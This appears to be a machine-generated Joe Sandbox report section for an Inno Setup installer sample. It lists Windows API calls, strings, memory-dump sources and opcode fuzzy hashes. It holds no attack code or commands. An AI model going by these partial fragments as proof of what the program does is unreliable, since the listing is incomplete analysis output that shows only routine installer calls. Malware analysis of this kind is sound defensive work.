                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$EnableEnabledVisible
                                                                                • String ID:
                                                                                • API String ID: 3234591441-0
                                                                                • Opcode ID: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                                                • Instruction ID: eab114e884733e02e348d5fb54c1eeaedaab2d2a8f53f62e6f3f1b5b82b3488b
                                                                                • Opcode Fuzzy Hash: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                                                • Instruction Fuzzy Hash: 90E0EDB9100300AAE711AB2BEC81A57769CBB94314F45843BAC099B293DA3EDC409B78
                                                                                APIs
                                                                                • SetActiveWindow.USER32(?), ref: 0046A378
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ActiveWindow
                                                                                • String ID: PrepareToInstall
                                                                                • API String ID: 2558294473-1101760603
                                                                                • Opcode ID: 2f09c314b6fb54b1472f2c84d4998d1c671ccdc982530a6e1a6c91392ff97de1
                                                                                • Instruction ID: 163d609461ff3b9580316b21a780dec1cd9204125e937a74b025edb926540d27
                                                                                • Opcode Fuzzy Hash: 2f09c314b6fb54b1472f2c84d4998d1c671ccdc982530a6e1a6c91392ff97de1
                                                                                • Instruction Fuzzy Hash: 90A10A34A00109DFCB00EB99D985EEEB7F5AF88304F1580B6E404AB362D738AE45DF59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: /:*?"<>|
                                                                                • API String ID: 0-4078764451
                                                                                • Opcode ID: daa5e4ec58dfd3a4f8b67407405db92af73f638a584e66193a323fc2660a566c
                                                                                • Instruction ID: b706238f5af82f8a54f925a22e06db4ee79b372672e861a4edd763b161806009
                                                                                • Opcode Fuzzy Hash: daa5e4ec58dfd3a4f8b67407405db92af73f638a584e66193a323fc2660a566c
                                                                                • Instruction Fuzzy Hash: 6F7197B0B44244AADB20E766DCC2BEE77A19F41704F108167F5807B392E7B99D45878E
                                                                                APIs
                                                                                • SetActiveWindow.USER32(?), ref: 004820FE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ActiveWindow
                                                                                • String ID: InitializeWizard
                                                                                • API String ID: 2558294473-2356795471
                                                                                • Opcode ID: 4cb1695e49b1b07e3586b425a713be07569947560fbf0fba233168fdeef3d44e
                                                                                • Instruction ID: b8891c381381d1a0014b65a4ce29d1dfbbdf9d421e77ac889de6892087eb3363
                                                                                • Opcode Fuzzy Hash: 4cb1695e49b1b07e3586b425a713be07569947560fbf0fba233168fdeef3d44e
                                                                                • Instruction Fuzzy Hash: BE118234205204DFD711EBA5FE96B2977E4EB55314F20143BE5008B3A1DA796C50CB6D
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C472,00000000,0047C5AC), ref: 0047C271
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C241
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                • API String ID: 47109696-1019749484
                                                                                • Opcode ID: 6e2d5090e95b4c6fabdd9168d7cad944b3593745ae6ad0b3bb6d2af319e0c910
                                                                                • Instruction ID: 70811ca8e083c9a3dbfae153db117623eb743e792d78c4ccda021ebaf15ccddc
                                                                                • Opcode Fuzzy Hash: 6e2d5090e95b4c6fabdd9168d7cad944b3593745ae6ad0b3bb6d2af319e0c910
                                                                                • Instruction Fuzzy Hash: 8EF08931B0411467DA00A5DA5C82B9E56DD8B55758F20407FF508EB253D9B99D02036C
                                                                                APIs
                                                                                • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,004763FA,?,0049C1D0,?,0046F403,?,00000000,0046F99E,?,_is1), ref: 0046F10F
                                                                                Strings
                                                                                • Inno Setup: Setup Version, xrefs: 0046F10D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: Inno Setup: Setup Version
                                                                                • API String ID: 3702945584-4166306022
                                                                                • Opcode ID: 734ac0f1c1098741eb0e60cbf617dbc9041c5452899e61f021b18629f5aca0fc
                                                                                • Instruction ID: 253732d940e31991125f8b939195b5ca02eb4333684dc2ddbbcc15e62aa31341
                                                                                • Opcode Fuzzy Hash: 734ac0f1c1098741eb0e60cbf617dbc9041c5452899e61f021b18629f5aca0fc
                                                                                • Instruction Fuzzy Hash: 3BE06D713012047FD710AA6B9C85F5BBADDDF993A5F10403AB908DB392D578DD4081A8
                                                                                APIs
                                                                                • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F7DA,?,?,00000000,0046F99E,?,_is1,?), ref: 0046F16F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: NoModify
                                                                                • API String ID: 3702945584-1699962838
                                                                                • Opcode ID: 14b653d2795b3180ab09acf432715bdcca8a399851f75d04a8bb0bb30e96b91c
                                                                                • Instruction ID: dfbc78ba79a393f528aadc4bccb3a1e1d52346a2df28baf9fde3d1272b39f611
                                                                                • Opcode Fuzzy Hash: 14b653d2795b3180ab09acf432715bdcca8a399851f75d04a8bb0bb30e96b91c
                                                                                • Instruction Fuzzy Hash: D8E04FB4604304BFEB04DB55DD4AF6B77ECDB48750F10415ABA04DB281E674EE00C668
                                                                                APIs
                                                                                • GetACP.KERNEL32(?,?,00000001,00000000,0047E25F,?,-0000001A,004800D8,-00000010,?,00000004,0000001B,00000000,00480425,?,0045DECC), ref: 0047DFF6
                                                                                  • Part of subcall function 0042E32C: 73E9A570.USER32(00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0042E33B
                                                                                  • Part of subcall function 0042E32C: EnumFontsA.GDI32(?,00000000,0042E318,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E366
                                                                                  • Part of subcall function 0042E32C: 73E9A480.USER32(00000000,?,0042E38B,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E37E
                                                                                • SendNotifyMessageA.USER32(000203BE,00000496,00002711,-00000001), ref: 0047E1C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: A480A570EnumFontsMessageNotifySend
                                                                                • String ID:
                                                                                • API String ID: 2685184028-0
                                                                                • Opcode ID: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
                                                                                • Instruction ID: 0ea8e5e95b90053dcc80dc26f94e29a170662e2b3e10ca2db4d961c35622b213
                                                                                • Opcode Fuzzy Hash: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
                                                                                • Instruction Fuzzy Hash: 2651A6746001508BD710FF27D9C16963799EB88308B90C6BBA8089F367C77CDD068B9D
                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DC4C
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DCBC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID:
                                                                                • API String ID: 3660427363-0
                                                                                • Opcode ID: dcaea444aa2693f3151e4f161b8541bd325653ac2cf38fab622dd52302d9ecee
                                                                                • Instruction ID: 0afc69acb925fd444515a6cbe8b6240f093bd173affdd4b5aabebdcedbe93bcc
                                                                                • Opcode Fuzzy Hash: dcaea444aa2693f3151e4f161b8541bd325653ac2cf38fab622dd52302d9ecee
                                                                                • Instruction Fuzzy Hash: E0414F71E00529ABDB11DF95D881BAFB7B8AB00714F90846AE800F7241D778AE00CBA9

APIs
  • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DF7C
  • RegCloseKey.ADVAPI32(?,0042DFED,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DFE0
Memory Dump Source
  • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
  • API ID: CloseEnum
  • String ID:
  • API String ID: 2818636725-0
  • Opcode ID: 18687f4e18b3232f9437fac6e5314fb2332009eed5616211d6a140e10b5cd508
  • Instruction ID: 2fe76ac110d60e281b9c8dcd8425dafac1d5c60e45ccd2ae84570cbaedcb928d
  • Opcode Fuzzy Hash: 18687f4e18b3232f9437fac6e5314fb2332009eed5616211d6a140e10b5cd508
  • Instruction Fuzzy Hash: 52319170F04258AEDB11DFA2DD82BAEB7B9EB48304F91407BE501E7281D6785A01CA2D

APIs
  • CreateProcessA.KERNEL32(00000000,00000000,?,?,004580B4,00000000,0045809C,?,?,?,00000000,0045284E,?,?,?,00000001), ref: 00452828
  • GetLastError.KERNEL32(00000000,00000000,?,?,004580B4,00000000,0045809C,?,?,?,00000000,0045284E,?,?,?,00000001), ref: 00452830
Memory Dump Source
  • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
  • API ID: CreateErrorLastProcess
  • String ID:
  • API String ID: 2919029540-0
  • Opcode ID: 256024ef10b7bad05e9cca563efcf05eafb457725b2bcd1ab333216967b323f1
  • Instruction ID: 3ad6dec6d32dc5e6ab031f6e5884ad9a987dc2d9ff381773f4694f698bcb58b9
  • Opcode Fuzzy Hash: 256024ef10b7bad05e9cca563efcf05eafb457725b2bcd1ab333216967b323f1
  • Instruction Fuzzy Hash: D3117972600208AF8B00DEADDD41DABB7ECEB4E310B10456BFD08E3201D678AE148BA4

APIs
  • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
  • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
Memory Dump Source
  • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
  • API ID: Resource$FindFree
  • String ID:
  • API String ID: 4097029671-0
  • Opcode ID: 020963cbed5d1efe29b5c6b0b84e3d8c20ff6c1b4cf1f3711bef16ed23147c41
  • Instruction ID: 22447e907da962d806d3eb032de74b702d5affa043e15eb070a4a3d902aeafed
  • Opcode Fuzzy Hash: 020963cbed5d1efe29b5c6b0b84e3d8c20ff6c1b4cf1f3711bef16ed23147c41
  • Instruction Fuzzy Hash: 0001DF71300604AFD710FF69DC92E1B77A9DB8A718711807AF500AB7D0DA79AC0096AD

APIs
  • GetCurrentThreadId.KERNEL32 ref: 0041EF03
  • 73EA5940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
Memory Dump Source
  • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
  • API ID: A5940CurrentThread
  • String ID:
  • API String ID: 2589350566-0
  • Opcode ID: 4f622a916fb84fb1e9f1f3e222a7611e51385d213cb7cd19795c9b5a33aefee2
  • Instruction ID: 3b2ca51acea6f31c20bceb620234c512699c69eae89bb1383ecfa3b3ac64bed2
  • Opcode Fuzzy Hash: 4f622a916fb84fb1e9f1f3e222a7611e51385d213cb7cd19795c9b5a33aefee2
  • Instruction Fuzzy Hash: FD013976A04604BFDB06CF6BDC1195ABBE9E789720B22887BEC04D36A0E6355810DE18

APIs
  • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CAE
  • GetLastError.KERNEL32(00000000,00000000,00000000,00452CD4), ref: 00452CB6
Memory Dump Source
  • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
  • API ID: ErrorFileLastMove
  • String ID:
  • API String ID: 55378915-0
  • Opcode ID: 4a87794495b209091e638427933314290125c3fb15c22ae1653921e41cb98622
  • Instruction ID: 8cb4f6990e07c72a34a39c3d349ee9eec810a974928c7dd1f8c60ebce1e721cc
  • Opcode Fuzzy Hash: 4a87794495b209091e638427933314290125c3fb15c22ae1653921e41cb98622
  • Instruction Fuzzy Hash: D5014971B00204BB8B11DF799D414AEB7ECEB4A32531045BBFC08E3243EAB84E048558

APIs
  • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527BB), ref: 00452795
  • GetLastError.KERNEL32(00000000,00000000,00000000,004527BB), ref: 0045279D
Memory Dump Source
  • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
  • API ID: CreateDirectoryErrorLast
  • String ID:
  • API String ID: 1375471231-0
  • Opcode ID: 638905229d0ae290751701005a3127306b10a627987a4e9871fe20b3b513e6c4
  • Instruction ID: 7517b5081c7c6af98826394809c6fe2d976c468da5ddf52a6f68070703836f12
  • Opcode Fuzzy Hash: 638905229d0ae290751701005a3127306b10a627987a4e9871fe20b3b513e6c4
  • Instruction Fuzzy Hash: 40F0FC71A04704AFCF00DF759D4199EB7E8DB0E715B5049B7FC14E3242E7B94E1485A8

APIs
  • LoadCursorA.USER32(00000000,00007F00), ref: 00423259
  • LoadCursorA.USER32(00000000,00000000), ref: 00423283
Memory Dump Source
  • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
  • API ID: CursorLoad
  • String ID:
  • API String ID: 3238433803-0
  • Opcode ID: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
  • Instruction ID: c8375b04fab070422f53c3d6524130e38f027298e82d6ab835706982cf041ecc
  • Opcode Fuzzy Hash: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
  • Instruction Fuzzy Hash: 0FF0A711704114AADA105D7E6CC0E2B7268DB91B36B6103BBFA3AD72D1C62E1D41457D

APIs
  • SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
  • LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
Memory Dump Source
  • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
  • API ID: ErrorLibraryLoadMode
  • String ID:
  • API String ID: 2987862817-0
  • Opcode ID: 7795cc8daa252176d65de3d8f3118caac988bfa791d53a68a28aad838e50b78c
  • Instruction ID: 98bcbcc3e9aaf4c66058534b39987ccdd7eb12bd14468eaf88ad72af9e5505e3
  • Opcode Fuzzy Hash: 7795cc8daa252176d65de3d8f3118caac988bfa791d53a68a28aad838e50b78c
  • Instruction Fuzzy Hash: D5F05E70A14744BEDF119F779C6282ABAACE749B1179248B6F810A3691E67D48108928

APIs
  • GetClassInfoA.USER32(00400000,?,?), ref: 004162F1
  • GetClassInfoA.USER32(00000000,?,?), ref: 00416301
Memory Dump Source
  • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
  • API ID: ClassInfo
  • String ID:
  • API String ID: 3534257612-0
  • Opcode ID: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
  • Instruction ID: dc9e2acc6f173dd0cc3aa24d84b637cb0067f0ccc6b7cec6a0fcec59befe77f5
  • Opcode Fuzzy Hash: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
  • Instruction Fuzzy Hash: 22E012B26015155ADB10DB999D81EE326DCDB09310B110167BE14CA246D764DD005BA4

APIs
  • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,004703F1,?,00000000), ref: 004508FA
  • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,004703F1,?,00000000), ref: 00450902
    • Part of subcall function 004506A0: GetLastError.KERNEL32(004504BC,00450762,?,00000000,?,004977FC,00000001,00000000,00000002,00000000,0049795D,?,?,00000005,00000000,00497991), ref: 004506A3
Memory Dump Source
  • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
  • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
